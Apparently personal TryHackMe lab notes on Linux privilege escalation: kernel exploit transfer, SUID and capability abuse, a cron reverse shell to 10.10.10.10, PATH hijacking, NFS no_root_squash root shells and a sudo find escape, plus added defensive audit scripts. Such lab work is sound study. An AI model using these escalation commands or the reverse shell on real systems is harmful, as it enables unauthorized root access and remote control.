linux privilege

tags: tryhackme privilege

Kernel Privilege

Target INFO

systems info


our machine

nc -lvnp 443 -k < ovf.c

Victim

cd /var/tmp
nc 10.17.11.72 443 > ovf.c
gcc ovf.c -o ovf 
./ovf

whoami

find / -name flag.txt 

cat flag.txt 

Sudo

Leverage Application

https://gtfobins.github.io/



It can be used to break out from restricted environments by spawning an interactive system shell.


SUID

Problem


Permission Bypass


Find files with the special SUID privilege (the "s" permission bit).

find / -type f -perm -04000 -ls 2>/dev/null


Capability


find

getcap -r / 2>/dev/null


:py3
import os
os.setuid(0)
os.execl("/bin/sh", "sh", "-c", "reset; exec sh")
# Execute the program "/bin/sh", passing it the arguments "sh" and "-c" and the string "reset; exec sh".

uid 0 -> root

execute /bin/sh

command:
sh -c reset // reset the terminal
sh -c exec sh //open new shell



./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'



Cron

cat /etc/crontab


vim backup.sh
chmod +x backup.sh

bash shell

bash -l >& /dev/tcp/10.10.10.10/6666 0>&1
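
The cron case above works because root runs a script that a lower-privileged user can edit. The following audit is an added example, not part of the original notes; the function name and finding labels are its own, and it assumes the system crontab layout (minute hour day month weekday user command).

```shell
#!/bin/sh
# audit_crontab FILE
# FILE uses the system crontab layout:
#   minute hour day month weekday user command ...
# Prints one finding per root job whose command file is owned by a
# non-root user or is writable by group/other.
audit_crontab() (
    set -f    # no glob expansion when the ls output is split below
    sed -e 's/#.*//' "$1" | while read -r m h dom mon dow user cmd rest; do
        [ "$user" = root ] || continue     # also skips blank and VAR=value lines
        [ -f "$cmd" ] || continue          # only commands that are existing files
        # ls -lnL: field 1 = mode string, field 3 = numeric owner uid
        set -- $(ls -lnL "$cmd")
        mode=$1 owner=$3
        [ "$owner" = 0 ] || echo "NONROOT-OWNER $cmd uid=$owner"
        # character 6 = group write, character 9 = other write
        case $(printf %s "$mode" | cut -c6,9) in
            *w*) echo "WRITABLE $cmd $mode" ;;
        esac
    done
)

# Audit the real file when run directly:
#   audit_crontab /etc/crontab
```

Any finding means the script should be owned by root with mode 755 or stricter, or the job should run as the script's owner instead of root.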


$PATH

$PATH writable

root file

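#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid(), setgid() */

int main(void) {
    setuid(0);
    setgid(0);
    /* "thm" has no path, so it is looked up through $PATH */
    system("thm");
    return 0;
}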

cd /tmp
echo "/bin/bash" > thm
./rootfile
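
The root file above is exposed because it runs "thm" without a path while a directory the user can write to is on $PATH. The following check is an added example, not part of the original notes; the function name and finding labels are its own. It lists the entries of a PATH string that let another user plant a binary.

```shell
#!/bin/sh
# audit_path PATH_STRING
# Prints one finding per risky entry:
#   EMPTY-ENTRY      an empty entry, which means the current directory
#   RELATIVE <dir>   an entry that is resolved against the current directory
#   WRITABLE <dir>   a directory that group or other can write to
audit_path() (
    case ":$1:" in
        *::*) echo "EMPTY-ENTRY" ;;
    esac
    IFS=:
    set -f                       # split on ":" only, no glob expansion
    for dir in $1; do
        [ -n "$dir" ] || continue
        case $dir in
            /*) ;;
            *)  echo "RELATIVE $dir"; continue ;;
        esac
        [ -d "$dir" ] || continue
        # ls -ldL prints e.g. drwxrwxrwt; character 6 = group write,
        # character 9 = other write. -L follows symlinks such as /bin.
        case $(ls -ldL "$dir" | cut -c6,9) in
            *w*) echo "WRITABLE $dir" ;;
        esac
    done
)

# Audit the PATH of the current session when run directly:
#   audit_path "$PATH"
```

A privileged program should call its helpers by absolute path and set its own PATH, so a finding here matters most for the environment that root jobs and SUID binaries inherit.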

NFS (Network File Share)

Vulnerable option -> "no_root_squash"

Display the target share file path

showmount --export 10.0.0.12

Show the NFS server's export list.

Using the share file directory

mount -o rw 10.0.0.12:/tmp /ourmachine/directory

-o optionslist

#include <stdio.h>
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid(), setgid() */

int main(void) {
    setuid(0);
    setgid(0);
    system("/bin/bash");   /* absolute path to the shell */
    return 0;
}


gcc code.c -o code -w 
chmod +s code    # set the SUID bit
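
On the server side, the condition that makes the steps above work is an export carrying no_root_squash. The following check is an added example, not part of the original notes; the function name is its own, and it assumes the usual /etc/exports layout of one export per line without backslash continuations.

```shell
#!/bin/sh
# find_no_root_squash FILE
# FILE is an exports file (normally /etc/exports). Prints
# "<exported path> <client>" for every client entry that has
# no_root_squash, i.e. where a remote uid 0 stays uid 0 on the share.
find_no_root_squash() (
    set -f    # a client of "*" must not be expanded as a glob
    sed -e 's/#.*//' "$1" | while read -r path clients; do
        [ -n "$path" ] || continue
        for c in $clients; do
            case $c in
                -*no_root_squash*)
                    # "-opts" after the path sets defaults for its clients
                    echo "$path <default options>" ;;
                *\(*no_root_squash*\))
                    # "(opts)" with no host in front applies to any host
                    host=${c%%\(*}
                    echo "$path ${host:-<any host>}" ;;
            esac
        done
    done
)

# Check the live configuration when run directly:
#   find_no_root_squash /etc/exports
```

Removing the option (root_squash is the default) and re-exporting with exportfs -ra maps remote root to an unprivileged user, so SUID files written by a client are no longer owned by root.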


Challenge

[leonard@ip-10-10-42-180 ~]$ uname -a
Linux
ip-10-10-42-180
3.10.0-1160.el7.x86_64 //kernel version
#1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64 x86_64
x86_64 GNU/Linux

Gathering system information

Testing kernel

no vulnerability


Sudo

NO sudo privilege

SUID

Using john to crack the root password

Brute-forcing the password failed.

Crontab

Target

We could try to find user Missy and Rootflag.

Not Missy and Rootflag users

Missy password -> Password1

Sudo -l (missy)

We can use the find command for privilege escalation.

sudo find . -exec /bin/sh \; -quit

flag 1

flag 2